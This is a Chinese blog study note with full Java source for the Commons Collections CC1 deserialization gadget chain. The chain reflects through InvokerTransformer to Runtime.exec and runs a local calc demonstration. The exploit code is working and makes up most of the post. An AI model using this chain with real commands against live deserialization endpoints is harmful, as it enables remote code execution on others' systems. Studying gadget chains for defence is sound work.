Java反序列化 CC1利用链记录

最新推荐文章于 2024-05-16 15:30:42 发布
最新推荐文章于 2024-05-16 15:30:42 发布
阅读量76 收藏
点赞数
分类专栏: Java反序列化利用链 文章标签: java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/LTianHang/article/details/128908868
版权

Java反序列化 CC1利用链记录

CC1利用链代码

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.TransformedMap;

import java.io.*;
import java.lang.annotation.Retention;
import java.lang.reflect.Constructor;
import java.lang.reflect.InvocationTargetException;
import java.util.HashMap;
import java.util.Map;

public class CC1 {
    public static void main(String[] args) throws Exception {
        Transformer[] transformers = new Transformer[]{
                //传入Runtime类
                new ConstantTransformer(Runtime.class),
                //反射调用getMethod方法,然后getMethod方法再反射调用getRuntime方法,返回Runtime.getRuntime()方法
                new InvokerTransformer("getMethod",
                        new Class[]{String.class, Class[].class},
                        new Object[]{"getRuntime", new Class[0]}),
                //反射调用invoke方法,然后反射执行Runtime.getRuntime()方法,返回Runtime实例化对象
                new InvokerTransformer("invoke",
                        new Class[]{Object.class, Object[].class},
                        new Object[]{null, new Object[0]}),
                //反射调用exec方法
                new InvokerTransformer("exec",
                        new Class[]{String.class},
                        new Object[]{"calc"})
        };
        //把transformers的4个Transformer执行
        Transformer transformerChain = new ChainedTransformer(transformers);

        Map map = new HashMap();
        map.put("value", "Roderick");
        Map tmap = TransformedMap.decorate(map, null, transformerChain);
        //反射获取AnnotationInvocationHandler的对象传入tmap
        Class c = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
        Constructor declaredConstructor = c.getDeclaredConstructor(Class.class, Map.class);
        declaredConstructor.setAccessible(true);
        Object o = declaredConstructor.newInstance(Retention.class, tmap);

        //序列化写文件
        ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("./src/main/java/CC1/outCC1.bin"));
        oos.writeObject(o);

        //反序列化触发payload
        ObjectInputStream ois = new ObjectInputStream(new FileInputStream("./src/main/java/CC1/outCC1.bin"));
        ois.readObject();

    }
keleth
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
java反序列化利用程序UI版Beta1.1.rar
07-20
java反序列化利用程序UI版Beta1.1.a
Java反序列化 CC5利用记录
LTianHang的博客
02-07 180
Java反序列化 CC5利用记录
Java反序列化 CC4利用记录
LTianHang的博客
02-07 209
Java反序列化 CC4利用记录
Java反序列化 CC2利用记录
LTianHang的博客
02-06 103
Java反序列化 CC2利用记录
Java反序列化 CC7利用记录
LTianHang的博客
02-07 114
Java反序列化 CC7利用记录
Java反序列化调用
GalaxySpaceX的博客
09-19 257
Java反序列化调用分析
JAVA反序列化CC1分析
Re_ly0n的博客
03-26 5519
反序列化的原理 首先是要继承Serialize类只有继承了这个类菜能够进行序列化,如果某一个类没有继承serialize类并在一条利用中所需要的地方,我们就可以通过反射来进行处理。例如在java中Runtime.getRuntime()是没有继承seralize类的 但是Runtime.class是继承了的 这样以来就可以通过反射来进行序列化和反序列化,反射核心代码如下 上面的代码都是可以成功弹出计算器的。利用的构造尝试使用同名不同类的方法来进行调用。在这里就是复习...
Java反序列化CC分析
阿道夫的博客
02-06 544
Apache Commons是Apache软件基金会的项目,曾经隶属于Jakarta项目。Commons的目的是提供可重用的、解决各种实际的通用问题且开源的Java代码。Commons由三部分组成:Proper(是一些已发布的项目)、Sandbox(是一些正在开发的项目)和Dormant(是一些刚启动或者已经停止维护的项目)。Commons Collections包为Java标准的CollectionsAPI提供了相当好的补充。在此基础上对其常用的数据结构操作进行了很好的封装、抽象和补充。
Java反序列化 CC3 TransformedMap利用与LazyMap利用记录
LTianHang的博客
02-07 137
Java反序列化 CC3 TransformedMap利用与LazyMap利用记录
8-java安全——java反序列化CC2分析
网络安全
07-19 2596
上一篇分析了CC1,本篇继续分析ysoserial工具的 apache commons collections 2利用CC1在实际利用过程存在一些限制,例如jdk1.8版本以上已经无法利用反序列化漏洞了,通过分析发现jdk8u181版本中改写了sun.reflect.annotation.AnnotationInvocationHandler类的readObject方法,CC1在jdk8版本以上已经被修复了,因此jdk8版本以上重新构造了一条新的利用(CC2)。 不过CC2使用
java反序列化工具
11-21
java反序列化工具,覆盖jboss、weblogic、websphere。
java 反序列化利用工具marshalsec-0.0.3-SNAPSHOT-all
12-27
java -cp target/marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.<Marshaller> [-a] [-v] [-t] [<gadget_type> []] 参数说明: -a:生成exploit下的所有payload(例如:hessian下的...
基于混合分析的Java反序列化利用挖掘方法
05-14
基于混合分析的Java反序列化利用挖掘方法 Java 程序开发 软件开发 参考文献 专业指导 计算机 课程资料 学习资料
Java反序列化实战.pdf
08-08
本议题将从那些经典案例入手,分析攻击方和防御方的对抗过程。会从fastjson与weblogic的两个经典漏洞,带大家傲游反序列化的世界。 反序列化入门 Fastjson Weblogic 反序列化防御
jar包增量更新分析
junlaiyan的专栏
05-16 245
借助jdeps分析出jar包的增量文件
java实现拼图小游戏
monkey108的博客
05-16 610
本文主要提供用java实现的拼图小游戏源代码。
c【语言】了解指针,爱上指针(1)
最新发布
yzqy_的博客
05-16 896
在计算机中,数据是存储在内存中的,cpu从内存中读取数据,为了方便读取数据,内存又被划分为了一个个的内存单元,一个内存单元的大小就是一字节,一字节等于8bit位,我们给内存进行编号,这个编号就是地址,在c语言中给这个地址起了个名字。是的,亲爱的读者你肯定发现了,&a、p和pc输出的地址是一样的,但&a+1与p+1输出的地址是一样的00EFF940,一次都跳过了4字节,而pc+1输出的却是00EFF93D,一次只跳过一个字节。但是硬件与硬件之间是相互独立的,这该如何实现数据传输呢?”答案当然是否定的。
命令执行漏洞(二)
XLbb的博客
05-15 896
POST方法,S2-045-bypass-2漏洞存在!,程序更改为S2-045-bypass-2漏洞测试模式, 响应码: 200。POST方法,S2-046-bypass漏洞存在!POST方法,S2-045-bypass漏洞存在!POST方法,S2-046-1漏洞存在!POST方法,S2-046-2漏洞存在!POST方法,S2-046-3漏洞存在!POST方法,S2-045-1漏洞存在!POST方法,S2-045-3漏洞存在!POST方法,S2-045-2漏洞存在!POST方法,S2-045-4漏洞存在!
java反序列化利用
04-29
Java反序列化利用是指黑客利用Java反序列化漏洞,通过构造恶意的序列化数据,将恶意代码注入目标系统,从而实现攻击的手段。Java反序列化漏洞可能带来很大的风险,因为黑客可以利用它来实现各种攻击,比如代码执行...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值